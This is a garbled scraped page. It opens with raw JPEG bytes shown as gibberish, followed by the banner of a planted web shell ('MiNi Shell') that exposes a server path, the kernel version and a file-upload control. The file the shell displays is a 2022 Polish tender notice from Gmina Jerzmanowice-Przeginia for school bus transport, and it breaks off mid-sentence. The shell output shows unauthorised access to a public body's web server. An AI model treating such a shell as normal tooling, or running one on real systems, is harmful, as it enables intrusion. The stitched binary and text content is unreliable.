JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220812/0030376701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług w zakresie dowozu dzieci i młodzieży do placówek oświatowych na terenie Gminy Jerzmanowice-Przeginia w okresie od 01.09.2022r. do 23.06.2023r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Wspólnych Gminy Jerzmanowice-Przeginia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 387816664</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rajska 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jerzmanowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-048</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">122887450</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cuw@jerzmanowice-przeginia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.jerzmanowice-przeginia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług w zakresie dowozu dzieci i młodzieży do placówek oświatowych na terenie Gminy Jerzmanowice-Przeginia w okresie od 01.09.2022r. do 23.06.2023r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a62e9bea-1a0e-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00303767</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://jerzmanowice-przeginia.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://jerzmanowice-przeginia.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a<br/>Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca<br/>2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz.U. z 2020 r., poz. 344), tj. poprzez Platformę przetargową pod adresem:<br/>https://jerzmanowice-przeginia.logintrade.net/rejestracja/ustawowe.html (zwanej dalej zamiennie Platformą przetargową), w wierszu<br/>oznaczonym tytułem oraz znakiem niniejszego postępowania<br/>1. Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>1) w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>2) wyłącznie poprzez Platformę przetargową.<br/>2. Niezwłocznie po otwarciu złożonych ofert, Zamawiający zamieści na Platformie przetargowej informacje dotyczące:<br/>1) nazwach albo imionach i nazwiskach oraz siedzibach lub miejscach prowadzonej działalności gospodarczej albo miejscach<br/>zamieszkania Wykonawców, których oferty zostały otwarte;<br/>2) cenach zawartych w ofertach.<br/>3. Informację o wyborze oferty najkorzystniejszej bądź o unieważnieniu postępowania Zamawiający zamieści na Platformie<br/>przetargowej.<br/>4. Przyjmuje się, że dokument wysłany przy użyciu Platformy przetargowej został doręczony Wykonawcy w sposób umożliwiający<br/>zapoznanie się z jego treścią, w dniu jego przekazania na Platformę przetargową.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://jerzmanowice-przeginia.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych (dalej jako: „Administrator&#34;) jest Centrum<br/>Usług Wspólnych, z siedzibą przy ulicy Rajskiej 22 w Jerzmanowicach 32-048, NIP 513-026-92-46, REGON 387816664 , tel: 12 288<br/>74 50, e-mail: cuw@jerzmanowice-przeginia.pl<br/>2. Administrator wyznaczył Inspektora Ochrony Danych nadzorującego prawidłowość przetwarzania danych osobowych, z którym<br/>można skontaktować się za pośrednictwem adresu e-mail: angelika@informatics.jaworzno.pl.<br/>3. Pani/Pana dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>prowadzonego w trybie przetargu nieograniczonego oraz w przypadku wyboru Pana/Pani oferty w celu realizacji warunków<br/>zawieranych umów; wykonania ciążących na Administratorze danych obowiązków prawnych (np. wystawienia i przechowywania<br/>faktur oraz innych dokumentów księgowych, udostępniania danych tzw. uprawnionym podmiotom w tym do sądu lub prokuratury);<br/>dochodzenia ewentualnych roszczeń z tytułu niewykonania lub nienależytego wykonania zawartej umowy.<br/>4. Podstawą prawną ich przetwarzania są: art. 6 ust. 1 lit. b ogólnego rozporządzenia o ochronie danych osobowych (przetwarzanie<br/>jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której<br/>dane dotyczą, przed zawarciem umowy), art. 6 ust. 1 lit. c (przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego<br/>ciążącego na administratorze) oraz ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, dalej „ustawa Pzp”.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 71 ustawy PZP.<br/>6. Pani/Pana dane osobowe pozyskane w związku z postępowaniem o udzielenie zamówienia i będą przetwarzane przez<br/>Zamawiającego wyłącznie w celu złożenia w/w oferty cenowej, w tym ewentualnego wykonania umowy, realizacji obowiązków i praw<br/>(w tym roszczeń) wiążących się z zawartą umową oraz w celu realizacji obowiązków wynikających z przepisów prawa.<br/>7. Pani/Pana dane osobowe będą przechowywane w zgodnym z przepisami powszechnie obowiązującego prawa przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy.<br/>8. Obowiązek podania osobowych jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych mogą uniemożliwić wzięcie<br/>udziału w postępowaniu.<br/>9. Posiada Pani/Pan prawo:<br/>- prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>- prawo do sprostowania (poprawiania) swoich danych;<br/><br/>- prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku<br/>wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej;<br/>- prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego praw;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy.<br/>10. Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany w tym również profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.26.11/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>„Świadczenie usług w zakresie dowozu dzieci i młodzieży do placówek oświatowych na terenie Gminy Jerzmanowice-<br/>Przeginia w okresie od 01.09.2022r. do 23.06.2023r.” w dni nauki szkolnej przyjmując organizację roku szkolnego zgodnie z<br/>rozporządzeniem Ministra Edukacji Narodowej z dnia 11 sierpnia 2017 r. w sprawie organizacji roku szkolnego (Dz. U. z<br/>2017 r., poz. 1603 z późn. zm.).<br/>1. Orientacyjna dzienna trasa przejazdu wszystkich autobusów wynosi około 250 km.<br/>2. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół oraz odwóz uczniów<br/>ze szkół na wyznaczony przystanek w miejscu zamieszkania.<br/>3. W przypadku zmiany organizacji zajęć polegającej na: skróceniu godzin nauki, sprawdzianu klas ósmych, rekolekcji i<br/>innych, odpracowaniu zajęć z dnia wypadającego pomiędzy dwoma dniami świątecznymi ustawowo wolnymi od pracy lub<br/>piątku wypadającego bezpośrednio po dniu świątecznym ustawowo wolnym od pracy w sobotę lub innych przyczyn<br/>Wykonawca zostaje powiadomiony przez Dyrektora szkoły lub Zamawiającego o zmianie terminu dowozu lub odwozu<br/>uczniów.<br/>4. Usługi będą świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej spełniającymi wszystkie<br/>wymagania bezpieczeństwa, higieny i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia<br/>tych usług. Wykonawca zamówienia musi zapewnić odpowiednią liczbę miejsc w autobusie – odpowiednio dla danej trasy.<br/>W przypadku awarii autobusu Wykonawca jest zobowiązany do zapewnienia zastępczego środka transportu, w taki sposób<br/>aby nie powodował opóźnień czasowych kursu.<br/>5. Wykonawca usługi zobowiązany jest do zawarcia umowy ubezpieczeniowej od odpowiedzialności cywilnej oraz następstw<br/>nieszczęśliwych wypadków w związku z wykonywaniem przedmiotu umowy.<br/>6. Dokładny wykaz tras oraz godziny przywozów i odwozów dzieci z poszczególnych miejscowości, leżących przy tych<br/>trasach, ustalony zostanie przez Wykonawcę z dyrektorami szkół. Dokładne oznaczenie przedziałów czasowych i<br/>przystanków w jakich powinien być wykonany dowóz uczniów do szkoły oraz ich odwiezienie po zakończeniu zajęć<br/>lekcyjnych ustalane będzie pomiędzy Przewoźnikiem a dyrektorami poszczególnych szkół do dnia 31.08.2022 r.<br/>7. Wszystkie dzieci, które rozpoczynają zajęcia lekcyjne muszą być przywiezione do poszczególnych szkół przynajmniej na<br/>5 minut przed rozpoczęciem zajęć lekcyjnych.<br/>8. Zamawiający zastrzega sobie możliwość wprowadzenia zmian w godzinach dowozu i odwozu. Z chwilą ustalenia<br/>rozkładu zajęć lekcyjnych Zamawiający i Wykonawca ustalą obowiązujący harmonogram dowozu i odwozu.<br/>9. Wykaz kursów, miejscowości, ilość dzieci do odwiezienia po lekcjach może ulec zmianie w zależności od zatwierdzonego<br/>rozkładu zajęć lekcyjnych w szkołach.<br/>10. Wykonawca przy realizacji usług zobowiązany będzie do:<br/>- Stosowania taboru do przewozu dzieci i młodzieży szkolnej oraz jego oznakowanie zgodnie zobowiązującymi w tym<br/>zakresie przepisami.<br/>- Ponoszenia kosztów szkód wynikłych w czasie wykonywania usług jak również do odpowiedzialności za wszelkie<br/>zdarzenia powstałe z tej przyczyny.<br/>- Sprawowanie opieki nad uczniami w trakcie ich dowozu do szkół oraz w drodze powrotnej.<br/>11. Szczegółowy opis przedmiotu zamówienia, w tym wymagania dotyczące świadczenia usługi przedstawia Część II<br/>zawierająca wzory umów oraz Część III zawierająca Opis Przedmiotu Zamówienia dla każdej części.<br/>12. 1Kody CPV (wg Wspólnego Słownika Zamówień):<br/><br/>- 60130000-8 – Usługi w zakresie specjalistycznego transportu drogowego osób (główny kod cpv);<br/>- 60100000-9 – Usługi w zakresie transportu drogowego<br/>13. Wykonawca zobowiązany jest do:<br/>- zdobycia wszelkich informacji niezbędnych do prawidłowego przygotowania oferty,<br/>- sprawdzenia i zweryfikowania materiałów przetargowych,<br/>- Wymaga się, aby Wykonawca zapoznał się z SWZ i złożył ofertę zgodnie z jej wymaganiami.<br/>- Ofertę może złożyć osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz<br/>podmioty te występujące wspólnie, o ile spełniają warunki określone w ustawie Prawo zamówień publicznych oraz w<br/>niniejszej specyfikacji istotnych warunków zamówienia.<br/>- Każdy Wykonawca może złożyć tylko jedną ofertę.<br/>14. Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Przez<br/>kluczowe części zamówienia Zamawiający rozumie zakres obejmujący „Świadczenie usług w zakresie dowozu dzieci i<br/>młodzieży do oświatowych na terenie Gminy Jerzmanowice-Przeginia w okresie od 01.09.2022r. do 23.06.2023r.”<br/>15. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Zamawiający jest obowiązany<br/>udzielić wyjaśnień zgodnie z art. 284 ustawy Pzp. W przypadku rozbieżności pomiędzy treścią SWZ, a treścią wyjaśnienia<br/>za obowiązującą należy przyjąć treść wyjaśnienia.<br/>16. W uzasadnionych przypadkach Zamawiający może, przed upływem terminu składania ofert zmienić treść SWZ.<br/>Dokonaną zmianę treści SWZ Zamawiający udostępni na stronie internetowej prowadzonego postępowania.<br/>Uwaga! Wyjaśnienia treści oraz zmiany/modyfikacje SWZ będą wyłącznie publikowane na stronie internetowej<br/>prowadzonego postępowania i nie będą indywidualnie przesyłane do Wykonawców.<br/>17. Zamawiający stosownie do treści art. 95 ust. 1 Ustawy Pzp, wymaga zatrudnienia przez wykonawcę na podstawie<br/>umowy o pracę osób wykonujących następujące czynności w zakresie realizacji zamówienia, których wykonanie polega na<br/>wykonywaniu pracy w sposób określony w art. 22 § 1* ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy:<br/>18. Zamawiający wymaga zatrudnienia przez Wykonawcę na podstawie umowy o pracę osób wykonujących wskazane<br/>poniżej czynności w przez cały okres trwania zamówienia tj. kierowanie pojazdami (kierowcy).<br/>19. Jeżeli oferta zostanie złożona przez osobę fizyczną prowadzącą działalność gospodarczą (samozatrudnienie), która<br/>czynności wskazane przez Zamawiającego, a wymagające zatrudnienia na podstawie umowy o pracę wykonuje<br/>samodzielnie, to wymóg Zamawiającego nie będzie miał zastosowania.<br/>20. Jeżeli oferta zostanie złożona przez spółkę osobową, w której wspólnicy będą samodzielnie świadczyli pracę w zakresie<br/>czynności określonych przez Zamawiającego, to wymóg Zamawiającego nie będzie miał zastosowania.<br/>21. Uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań, o których mowa w art. 95 ust. 1,<br/>oraz sankcji z tytułu niespełnienia tych wymagań – wskazano we wzorze umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje udzielenie zamówień polegających na powtórzeniu podobnych usług jak w zamówieniu<br/>podstawowym na zasadach określonych w ustawie prawo zamówień publicznych, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień polegających na powtórzeniu podobnych usług jak w zamówieniu<br/>podstawowym na zasadach określonych w ustawie prawo zamówień publicznych, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich wagi:<br/>-CENA -60 %<br/>-CZAS PODSTAWIENIA POJAZDU ZASTĘPCZEGO W RAZIE AWARII -20 %<br/>-KLIMATYZACJA W SAMOCHODZIE -20%<br/>wg następującego wzoru:<br/>samochód z klimatyzacją – 20 pkt.<br/>Samochód bez klimatyzacji – 0 pkt.<br/>2. Najkorzystniejszą ofertą będzie oferta, której przyznana zostanie największa liczba punktów łącznie we wszystkich kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klimatyzacja w samochodzie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Warunki udziału w postępowaniu, określone przez Zamawiającego zgodnie z art. 112 ust. 1 ustawy Pzp:<br/>-	Zdolności do występowania w obrocie gospodarczym.<br/>-	Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. Warunek będzie potwierdzony jeżeli Wykonawca wykaże, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób, o której mowa w art. 5 ust. 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2022 r., poz. 180 z późn. zm.);<br/>3.	Sytuacji ekonomicznej lub finansowej Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4.	Zdolności technicznej lub zawodowej - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:<br/>1)	posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj.<br/>Warunek będzie potwierdzony jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 2 usługi polegające na dowozie dzieci do szkół/placówek każda o wartości brutto minimum: 150 000 tys. zł.<br/><br/>-	Zamawiający nie dopuszcza sumowania umów o mniejszej wartości. Przez jedną usługę rozumie się jedną umowę.<br/>-	Wykaz należy przygotować według wzoru stanowiącego załącznik nr 4 „Wykaz usług”.<br/>-	Usługi wykraczające poza wymagany charakter nie będą brane pod uwagę przy ocene ofert.<br/>-	Zamawiający wymaga, aby Wykonawca podał wartości, przedmiot, daty wykonania i odbiorców wymienionych usług oraz załączył dokumenty potwierdzające, że ww. usługi zostały wykonane należycie.<br/>2)	Dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia tj.<br/>Warunek będzie potwierdzony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w czasie wykonywania zamówienia co najmniej 1 osobą dla 